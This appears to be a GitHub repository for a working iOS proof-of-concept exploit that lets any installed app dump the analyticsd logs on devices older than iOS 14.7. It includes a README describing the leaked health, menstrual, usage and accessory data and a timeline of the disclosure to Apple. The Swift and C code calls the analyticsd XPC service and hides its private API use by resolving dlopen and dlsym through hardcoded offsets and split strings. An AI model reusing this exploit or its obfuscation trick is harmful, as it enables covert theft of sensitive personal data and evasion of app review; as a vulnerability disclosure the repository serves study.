Repository: illusionofchaos/ios-analyticsd-pre14.7-exploit Branch: main Commit: a617cb0c5f37 Files: 15 Total size: 29.1 KB Directory structure: gitextract_735k5gzs/ ├── .gitignore ├── Analyticsd/ │ ├── Analyticsd-Bridging-Header.h │ ├── AnalyticsdApp.swift │ ├── Assets.xcassets/ │ │ ├── AccentColor.colorset/ │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset/ │ │ │ └── Contents.json │ │ └── Contents.json │ ├── ContentView.swift │ ├── Info.plist │ ├── Preview Content/ │ │ └── Preview Assets.xcassets/ │ │ └── Contents.json │ ├── c.c │ └── c.h ├── Analyticsd.xcodeproj/ │ ├── project.pbxproj │ └── project.xcworkspace/ │ ├── contents.xcworkspacedata │ └── xcshareddata/ │ └── IDEWorkspaceChecks.plist └── README.md ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Xcode # # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore ## User settings xcuserdata/ ## compatibility with Xcode 8 and earlier (ignoring not required starting Xcode 9) *.xcscmblueprint *.xccheckout ## compatibility with Xcode 3 and earlier (ignoring not required starting Xcode 4) build/ DerivedData/ *.moved-aside *.pbxuser !default.pbxuser *.mode1v3 !default.mode1v3 *.mode2v3 !default.mode2v3 *.perspectivev3 !default.perspectivev3 ## Obj-C/Swift specific *.hmap ## App packaging *.ipa *.dSYM.zip *.dSYM ## Playgrounds timeline.xctimeline playground.xcworkspace # Swift Package Manager # # Add this line if you want to avoid checking in source code from Swift Package Manager dependencies. # Packages/ # Package.pins # Package.resolved # *.xcodeproj # # Xcode automatically generates this directory with a .xcworkspacedata file and xcuserdata # hence it is not needed unless you have added a package configuration file to your project # .swiftpm .build/ # CocoaPods # # We recommend against adding the Pods directory to your .gitignore. However # you should judge for yourself, the pros and cons are mentioned at: # https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control # # Pods/ # # Add this line if you want to avoid checking in source code from the Xcode workspace # *.xcworkspace # Carthage # # Add this line if you want to avoid checking in source code from Carthage dependencies. # Carthage/Checkouts Carthage/Build/ # Accio dependency management Dependencies/ .accio/ # fastlane # # It is recommended to not store the screenshots in the git repo. # Instead, use fastlane to re-generate the screenshots whenever they are needed. # For more information about the recommended setup visit: # https://docs.fastlane.tools/best-practices/source-control/#source-control fastlane/report.xml fastlane/Preview.html fastlane/screenshots/**/*.png fastlane/test_output # Code Injection # # After new code Injection tools there's a generated folder /iOSInjectionProject # https://github.com/johnno1962/injectionforxcode iOSInjectionProject/ ================================================ FILE: Analyticsd/Analyticsd-Bridging-Header.h ================================================ #include "c.h" // //@import Foundation; // //typedef void * xpc_object_t; //typedef void * xpc_connection_t; //typedef void (^xpc_handler_t)(xpc_object_t object); // //xpc_connection_t xpc_connection_create_mach_service(const char *name, dispatch_queue_t targetq, uint64_t flags); //void xpc_connection_set_event_handler(xpc_connection_t connection, xpc_handler_t handler); //void xpc_connection_resume(xpc_connection_t connection); //xpc_object_t xpc_dictionary_create(const char *const _Nonnull *keys, xpc_object_t _Nullable const *values, size_t count); //void xpc_dictionary_set_string(xpc_object_t xdict, const char *key, const char *string); //xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection, xpc_object_t message); //const char * xpc_dictionary_get_string(xpc_object_t xdict, const char *key); ================================================ FILE: Analyticsd/AnalyticsdApp.swift ================================================ import SwiftUI @main struct AnalyticsdApp: App { var body: some Scene { WindowGroup { ContentView() } } } ================================================ FILE: Analyticsd/Assets.xcassets/AccentColor.colorset/Contents.json ================================================ { "colors" : [ { "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/Assets.xcassets/AppIcon.appiconset/Contents.json ================================================ { "images" : [ { "idiom" : "iphone", "scale" : "2x", "size" : "20x20" }, { "idiom" : "iphone", "scale" : "3x", "size" : "20x20" }, { "idiom" : "iphone", "scale" : "2x", "size" : "29x29" }, { "idiom" : "iphone", "scale" : "3x", "size" : "29x29" }, { "idiom" : "iphone", "scale" : "2x", "size" : "40x40" }, { "idiom" : "iphone", "scale" : "3x", "size" : "40x40" }, { "idiom" : "iphone", "scale" : "2x", "size" : "60x60" }, { "idiom" : "iphone", "scale" : "3x", "size" : "60x60" }, { "idiom" : "ipad", "scale" : "1x", "size" : "20x20" }, { "idiom" : "ipad", "scale" : "2x", "size" : "20x20" }, { "idiom" : "ipad", "scale" : "1x", "size" : "29x29" }, { "idiom" : "ipad", "scale" : "2x", "size" : "29x29" }, { "idiom" : "ipad", "scale" : "1x", "size" : "40x40" }, { "idiom" : "ipad", "scale" : "2x", "size" : "40x40" }, { "idiom" : "ipad", "scale" : "1x", "size" : "76x76" }, { "idiom" : "ipad", "scale" : "2x", "size" : "76x76" }, { "idiom" : "ipad", "scale" : "2x", "size" : "83.5x83.5" }, { "idiom" : "ios-marketing", "scale" : "1x", "size" : "1024x1024" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/Assets.xcassets/Contents.json ================================================ { "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/ContentView.swift ================================================ import SwiftUI struct ContentView: View { @State var json = "" @State var jsonData: [(String,Any)] = [] var body: some View { NavigationView { if !json.isEmpty { List { NavigationLink("Tree", destination: TreeView(data: jsonData)) NavigationLink("Raw JSON", destination: ScrollView(.vertical, showsIndicators: true, content: { Text(json) })) } } else { Text("wait") } } .onAppear { json = analyticsJson() jsonData = (try! JSONSerialization.jsonObject(with: json.data(using: .utf8)!, options: []) as! [String:Any]).sorted { $0.key < $1.key } } } } struct TreeView: View { let data: [(String,Any)] var body: some View { List(data, id: \.0) { row in if let value = row.1 as? [String:Any] { NavigationLink(row.0, destination: TreeView(data: value.sorted { $0.key < $1.key })) } else if let value = row.1 as? [[String:Any]] { NavigationLink(row.0, destination: List(Dictionary(grouping: value, by: { ($0["name"] as? String) ?? "no name" }) .sorted { $0.key < $1.key }, id: \.0) { row in let messages = row.1.map { ($0["message"] as? [String:Any])?.sorted { $0.key < $1.key } ?? []} NavigationLink(row.0, destination: List { ForEach(messages, id: \.description) { message in Section(content: { ForEach(message, id: \.key) { row in HStack { Text(row.0) Spacer() Text("\(row.1)" as String) } } }) } }.listStyle(GroupedListStyle()) ) } ) } else { HStack { Text(row.0) Spacer() Text("\(row.1)" as String) } } } } } let dylib = normal_function1(["/usr/lib/system/libxp", ".dylib"].joined(separator: "c"), 0) let normalFunction3 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_create_mach_service"].joined(separator: "c")), to: (@convention(c) (UnsafePointer, DispatchQueue?, UInt64) -> (OpaquePointer)).self) let normalFunction4 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_set_event_handler"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, @escaping (OpaquePointer) -> Void) -> Void).self) let normalFunction5 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_resume"].joined(separator: "c")), to: (@convention(c) (OpaquePointer) -> Void).self) let normalFunction6 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_create"].joined(separator: "c")), to: (@convention(c) (OpaquePointer?, OpaquePointer?, Int) -> OpaquePointer).self) let normalFunction7 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_set_string"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, UnsafePointer, UnsafePointer) -> Void).self) let normalFunction8 = unsafeBitCast(normal_function2(dylib, ["xp", "_connection_send_message_with_reply_sync"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, OpaquePointer) -> OpaquePointer).self) let normalFunction9 = unsafeBitCast(normal_function2(dylib, ["xp", "_dictionary_get_string"].joined(separator: "c")), to: (@convention(c) (OpaquePointer, UnsafePointer) -> UnsafePointer).self) func analyticsJson() -> String { let connection = normalFunction3("com.apple.analyticsd", nil, 2) normalFunction4(connection, { _ in }) normalFunction5(connection) let xdict = normalFunction6(nil, nil, 0) normalFunction7(xdict, "command", "log-dump") let reply = normalFunction8(connection, xdict) return String(cString: normalFunction9(reply, "log-dump")) } // //func analyticsJson() -> String { // let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2) // xpc_connection_set_event_handler(connection, { _ in }) // xpc_connection_resume(connection) // let xdict = xpc_dictionary_create(nil, nil, 0) // xpc_dictionary_set_string(xdict, "command", "log-dump") // let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) // return String(cString: xpc_dictionary_get_string(reply, "log-dump")) //} ================================================ FILE: Analyticsd/Info.plist ================================================ CFBundleDevelopmentRegion $(DEVELOPMENT_LANGUAGE) CFBundleExecutable $(EXECUTABLE_NAME) CFBundleIdentifier $(PRODUCT_BUNDLE_IDENTIFIER) CFBundleInfoDictionaryVersion 6.0 CFBundleName $(PRODUCT_NAME) CFBundlePackageType $(PRODUCT_BUNDLE_PACKAGE_TYPE) CFBundleShortVersionString 1.0 CFBundleVersion 1 LSRequiresIPhoneOS UIApplicationSceneManifest UIApplicationSupportsMultipleScenes UIApplicationSupportsIndirectInputEvents UILaunchScreen UIRequiredDeviceCapabilities armv7 UISupportedInterfaceOrientations UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight UISupportedInterfaceOrientations~ipad UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight ================================================ FILE: Analyticsd/Preview Content/Preview Assets.xcassets/Contents.json ================================================ { "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: Analyticsd/c.c ================================================ #include "c.h" void * normal_function1(const char * arg1, int arg2) { return ((void *(*)(const char *, int))((long long)dyld_stub_binder - 20780))(arg1, arg2); } void * normal_function2(void * arg1, const char * arg2) { return ((void *(*)(void *, const char *))((long long)dyld_stub_binder - 20648))(arg1, arg2); } // //#include //#include //void findOffsets() { // printf("%lld\n",(long long)dyld_stub_binder - (long long)dlopen); // 20780 // printf("%lld\n",(long long)dyld_stub_binder - (long long)dlsym); // 20648 //} ================================================ FILE: Analyticsd/c.h ================================================ #ifndef c_h #define c_h #define NO_UND(func) extern void func(void) asm(#func); NO_UND(dyld_stub_binder); void * normal_function1(const char * arg1, int arg2); // dlopen void * normal_function2(void * arg1, const char * arg2); // dlsym //void findOffsets(); #endif /* c_h */ ================================================ FILE: Analyticsd.xcodeproj/project.pbxproj ================================================ // !$*UTF8*$! { archiveVersion = 1; classes = { }; objectVersion = 50; objects = { /* Begin PBXBuildFile section */ DF0878E12701ED240055F994 /* c.c in Sources */ = {isa = PBXBuildFile; fileRef = DF0878E02701ED240055F994 /* c.c */; }; DF41FC762638AE09007214FA /* AnalyticsdApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = DF41FC752638AE09007214FA /* AnalyticsdApp.swift */; }; DF41FC782638AE09007214FA /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = DF41FC772638AE09007214FA /* ContentView.swift */; }; DF41FC7A2638AE0B007214FA /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = DF41FC792638AE0B007214FA /* Assets.xcassets */; }; DF41FC7D2638AE0B007214FA /* Preview Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ DF0878DF2701ED240055F994 /* c.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = c.h; sourceTree = ""; }; DF0878E02701ED240055F994 /* c.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = c.c; sourceTree = ""; }; DF41FC722638AE09007214FA /* Analyticsd.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Analyticsd.app; sourceTree = BUILT_PRODUCTS_DIR; }; DF41FC752638AE09007214FA /* AnalyticsdApp.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AnalyticsdApp.swift; sourceTree = ""; }; DF41FC772638AE09007214FA /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; DF41FC792638AE0B007214FA /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = "Preview Assets.xcassets"; sourceTree = ""; }; DF41FC7E2638AE0B007214FA /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; DF41FC842638AE2F007214FA /* Analyticsd-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "Analyticsd-Bridging-Header.h"; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ DF41FC6F2638AE09007214FA /* Frameworks */ = { isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXFrameworksBuildPhase section */ /* Begin PBXGroup section */ DF41FC692638AE09007214FA = { isa = PBXGroup; children = ( DF41FC742638AE09007214FA /* Analyticsd */, DF41FC732638AE09007214FA /* Products */, ); sourceTree = ""; }; DF41FC732638AE09007214FA /* Products */ = { isa = PBXGroup; children = ( DF41FC722638AE09007214FA /* Analyticsd.app */, ); name = Products; sourceTree = ""; }; DF41FC742638AE09007214FA /* Analyticsd */ = { isa = PBXGroup; children = ( DF41FC752638AE09007214FA /* AnalyticsdApp.swift */, DF41FC772638AE09007214FA /* ContentView.swift */, DF41FC792638AE0B007214FA /* Assets.xcassets */, DF41FC7E2638AE0B007214FA /* Info.plist */, DF41FC7B2638AE0B007214FA /* Preview Content */, DF41FC842638AE2F007214FA /* Analyticsd-Bridging-Header.h */, DF0878DF2701ED240055F994 /* c.h */, DF0878E02701ED240055F994 /* c.c */, ); path = Analyticsd; sourceTree = ""; }; DF41FC7B2638AE0B007214FA /* Preview Content */ = { isa = PBXGroup; children = ( DF41FC7C2638AE0B007214FA /* Preview Assets.xcassets */, ); path = "Preview Content"; sourceTree = ""; }; /* End PBXGroup section */ /* Begin PBXNativeTarget section */ DF41FC712638AE09007214FA /* Analyticsd */ = { isa = PBXNativeTarget; buildConfigurationList = DF41FC812638AE0B007214FA /* Build configuration list for PBXNativeTarget "Analyticsd" */; buildPhases = ( DF41FC6E2638AE09007214FA /* Sources */, DF41FC6F2638AE09007214FA /* Frameworks */, DF41FC702638AE09007214FA /* Resources */, ); buildRules = ( ); dependencies = ( ); name = Analyticsd; productName = Analyticsd; productReference = DF41FC722638AE09007214FA /* Analyticsd.app */; productType = "com.apple.product-type.application"; }; /* End PBXNativeTarget section */ /* Begin PBXProject section */ DF41FC6A2638AE09007214FA /* Project object */ = { isa = PBXProject; attributes = { LastSwiftUpdateCheck = 1250; LastUpgradeCheck = 1250; TargetAttributes = { DF41FC712638AE09007214FA = { CreatedOnToolsVersion = 12.5; LastSwiftMigration = 1250; }; }; }; buildConfigurationList = DF41FC6D2638AE09007214FA /* Build configuration list for PBXProject "Analyticsd" */; compatibilityVersion = "Xcode 9.3"; developmentRegion = en; hasScannedForEncodings = 0; knownRegions = ( en, Base, ); mainGroup = DF41FC692638AE09007214FA; productRefGroup = DF41FC732638AE09007214FA /* Products */; projectDirPath = ""; projectRoot = ""; targets = ( DF41FC712638AE09007214FA /* Analyticsd */, ); }; /* End PBXProject section */ /* Begin PBXResourcesBuildPhase section */ DF41FC702638AE09007214FA /* Resources */ = { isa = PBXResourcesBuildPhase; buildActionMask = 2147483647; files = ( DF41FC7D2638AE0B007214FA /* Preview Assets.xcassets in Resources */, DF41FC7A2638AE0B007214FA /* Assets.xcassets in Resources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXResourcesBuildPhase section */ /* Begin PBXSourcesBuildPhase section */ DF41FC6E2638AE09007214FA /* Sources */ = { isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( DF0878E12701ED240055F994 /* c.c in Sources */, DF41FC782638AE09007214FA /* ContentView.swift in Sources */, DF41FC762638AE09007214FA /* AnalyticsdApp.swift in Sources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXSourcesBuildPhase section */ /* Begin XCBuildConfiguration section */ DF41FC7F2638AE0B007214FA /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; CLANG_ANALYZER_NONNULL = YES; CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; CLANG_CXX_LIBRARY = "libc++"; CLANG_ENABLE_MODULES = YES; CLANG_ENABLE_OBJC_ARC = YES; CLANG_ENABLE_OBJC_WEAK = YES; CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; CLANG_WARN_BOOL_CONVERSION = YES; CLANG_WARN_COMMA = YES; CLANG_WARN_CONSTANT_CONVERSION = YES; CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; CLANG_WARN_DOCUMENTATION_COMMENTS = YES; CLANG_WARN_EMPTY_BODY = YES; CLANG_WARN_ENUM_CONVERSION = YES; CLANG_WARN_INFINITE_RECURSION = YES; CLANG_WARN_INT_CONVERSION = YES; CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; CLANG_WARN_STRICT_PROTOTYPES = YES; CLANG_WARN_SUSPICIOUS_MOVE = YES; CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; CLANG_WARN_UNREACHABLE_CODE = YES; CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; COPY_PHASE_STRIP = NO; DEBUG_INFORMATION_FORMAT = dwarf; ENABLE_STRICT_OBJC_MSGSEND = YES; ENABLE_TESTABILITY = YES; GCC_C_LANGUAGE_STANDARD = gnu11; GCC_DYNAMIC_NO_PIC = NO; GCC_NO_COMMON_BLOCKS = YES; GCC_OPTIMIZATION_LEVEL = 0; GCC_PREPROCESSOR_DEFINITIONS = ( "DEBUG=1", "$(inherited)", ); GCC_WARN_64_TO_32_BIT_CONVERSION = YES; GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; GCC_WARN_UNDECLARED_SELECTOR = YES; GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; GCC_WARN_UNUSED_FUNCTION = YES; GCC_WARN_UNUSED_VARIABLE = YES; IPHONEOS_DEPLOYMENT_TARGET = 14.5; MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; MTL_FAST_MATH = YES; ONLY_ACTIVE_ARCH = YES; SDKROOT = iphoneos; SWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG; SWIFT_OPTIMIZATION_LEVEL = "-Onone"; }; name = Debug; }; DF41FC802638AE0B007214FA /* Release */ = { isa = XCBuildConfiguration; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; CLANG_ANALYZER_NONNULL = YES; CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; CLANG_CXX_LIBRARY = "libc++"; CLANG_ENABLE_MODULES = YES; CLANG_ENABLE_OBJC_ARC = YES; CLANG_ENABLE_OBJC_WEAK = YES; CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; CLANG_WARN_BOOL_CONVERSION = YES; CLANG_WARN_COMMA = YES; CLANG_WARN_CONSTANT_CONVERSION = YES; CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; CLANG_WARN_DOCUMENTATION_COMMENTS = YES; CLANG_WARN_EMPTY_BODY = YES; CLANG_WARN_ENUM_CONVERSION = YES; CLANG_WARN_INFINITE_RECURSION = YES; CLANG_WARN_INT_CONVERSION = YES; CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; CLANG_WARN_STRICT_PROTOTYPES = YES; CLANG_WARN_SUSPICIOUS_MOVE = YES; CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; CLANG_WARN_UNREACHABLE_CODE = YES; CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; COPY_PHASE_STRIP = NO; DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; ENABLE_NS_ASSERTIONS = NO; ENABLE_STRICT_OBJC_MSGSEND = YES; GCC_C_LANGUAGE_STANDARD = gnu11; GCC_NO_COMMON_BLOCKS = YES; GCC_WARN_64_TO_32_BIT_CONVERSION = YES; GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; GCC_WARN_UNDECLARED_SELECTOR = YES; GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; GCC_WARN_UNUSED_FUNCTION = YES; GCC_WARN_UNUSED_VARIABLE = YES; IPHONEOS_DEPLOYMENT_TARGET = 14.5; MTL_ENABLE_DEBUG_INFO = NO; MTL_FAST_MATH = YES; SDKROOT = iphoneos; SWIFT_COMPILATION_MODE = wholemodule; SWIFT_OPTIMIZATION_LEVEL = "-O"; VALIDATE_PRODUCT = YES; }; name = Release; }; DF41FC822638AE0B007214FA /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CLANG_ENABLE_MODULES = YES; CODE_SIGN_STYLE = Automatic; DEVELOPMENT_ASSET_PATHS = "\"Analyticsd/Preview Content\""; DEVELOPMENT_TEAM = ZGR22SPY5B; ENABLE_PREVIEWS = YES; INFOPLIST_FILE = Analyticsd/Info.plist; IPHONEOS_DEPLOYMENT_TARGET = 14.0; LD_RUNPATH_SEARCH_PATHS = ( "$(inherited)", "@executable_path/Frameworks", ); PRODUCT_BUNDLE_IDENTIFIER = dt.Analyticsd; PRODUCT_NAME = "$(TARGET_NAME)"; SWIFT_OBJC_BRIDGING_HEADER = "Analyticsd/Analyticsd-Bridging-Header.h"; SWIFT_OPTIMIZATION_LEVEL = "-Onone"; SWIFT_VERSION = 5.0; TARGETED_DEVICE_FAMILY = "1,2"; }; name = Debug; }; DF41FC832638AE0B007214FA /* Release */ = { isa = XCBuildConfiguration; buildSettings = { ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CLANG_ENABLE_MODULES = YES; CODE_SIGN_STYLE = Automatic; DEVELOPMENT_ASSET_PATHS = "\"Analyticsd/Preview Content\""; DEVELOPMENT_TEAM = ZGR22SPY5B; ENABLE_PREVIEWS = YES; INFOPLIST_FILE = Analyticsd/Info.plist; IPHONEOS_DEPLOYMENT_TARGET = 14.0; LD_RUNPATH_SEARCH_PATHS = ( "$(inherited)", "@executable_path/Frameworks", ); PRODUCT_BUNDLE_IDENTIFIER = dt.Analyticsd; PRODUCT_NAME = "$(TARGET_NAME)"; SWIFT_OBJC_BRIDGING_HEADER = "Analyticsd/Analyticsd-Bridging-Header.h"; SWIFT_VERSION = 5.0; TARGETED_DEVICE_FAMILY = "1,2"; }; name = Release; }; /* End XCBuildConfiguration section */ /* Begin XCConfigurationList section */ DF41FC6D2638AE09007214FA /* Build configuration list for PBXProject "Analyticsd" */ = { isa = XCConfigurationList; buildConfigurations = ( DF41FC7F2638AE0B007214FA /* Debug */, DF41FC802638AE0B007214FA /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; DF41FC812638AE0B007214FA /* Build configuration list for PBXNativeTarget "Analyticsd" */ = { isa = XCConfigurationList; buildConfigurations = ( DF41FC822638AE0B007214FA /* Debug */, DF41FC832638AE0B007214FA /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; /* End XCConfigurationList section */ }; rootObject = DF41FC6A2638AE09007214FA /* Project object */; } ================================================ FILE: Analyticsd.xcodeproj/project.xcworkspace/contents.xcworkspacedata ================================================ ================================================ FILE: Analyticsd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist ================================================ IDEDidComputeMac32BitWarning ================================================ FILE: README.md ================================================ # Analyticsd pre-14.7 exploit I've updated this code to avoid using Private API directly. Read more in my [blog post](https://habr.com/en/post/580272/). However, that means that now this code is iOS version-specific and possibly device model-specific. So if it doesn't work on your device, recalculate and update the offsets in `c.c` file. The original code can be found in [direct](https://github.com/illusionofchaos/ios-analyticsd-pre14.7-exploit/tree/direct) branch. This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in **Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily...**). These logs contain the following information (including, but not limited to): - medical information (heart rate, count of detected atrial fibrillation and irregular heart rythm events) - menstrual cycle length, biological sex and age, whether user is logging sexual activity, cervical mucus quality, etc. - device usage information (device pickups in different contexts, push notifications count and user's action, etc.) - screen time information and session count for all applications with their respective bundle IDs - information about device accessories with their manufacturer, model, firmware version and user-assigned names - application crashes with bundle IDs and exception codes - languages of web pages that user viewed in Safari All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That's why it's very hypocritical of Apple to [claim that they deeply care about privacy](https://www.apple.com/privacy/). All this data was being collected and available to an attacker even if "Share analytics" was turned off in settings. ``` const char * analytics_json(void) { xpc_connection_t connection = xpc_connection_create_mach_service("com.apple.analyticsd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(connection, (^(xpc_object_t object){})); xpc_connection_resume(connection); xpc_object_t xdict = xpc_dictionary_create(0, 0, 0); xpc_dictionary_set_string(xdict, "command", "log-dump"); xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, xdict); return xpc_dictionary_get_string(reply, "log-dump"); } ``` Timeline: April 29 2021 - I sent a detailed report to Apple April 30 2021 - Apple replied that they had reviewed the report and are investigated May 20 2021 - I've requested a status update from Apple (and recieved no reply) May 30 2021 - I've requested a status update from Apple June 3 2021 - Apple replied that they plan to address the issue in the upcoming update July 19 2021 - iOS 14.7 is released with the fix July 20 2021 - I've requested a status update from Apple July 21 2021 - iOS 14.7 security contents list is published, this vulnerability is not mentioned (https://support.apple.com/en-us/HT212601) July 22 2021 - I've asked Apple a question why the vulnerability is not on the list Same day I receive the following reply: **Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience. ** July 26 2021 - iOS 14.7.1 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212623) September 13 2021 - iOS 14.8 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212807) Same day I asked for an explanation and informed Apple that I would make all my reasearch public unless I receive a reply soon. September 20 2021 - iOS 15.0 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212814) September 24 2021 - I still haven't received any reply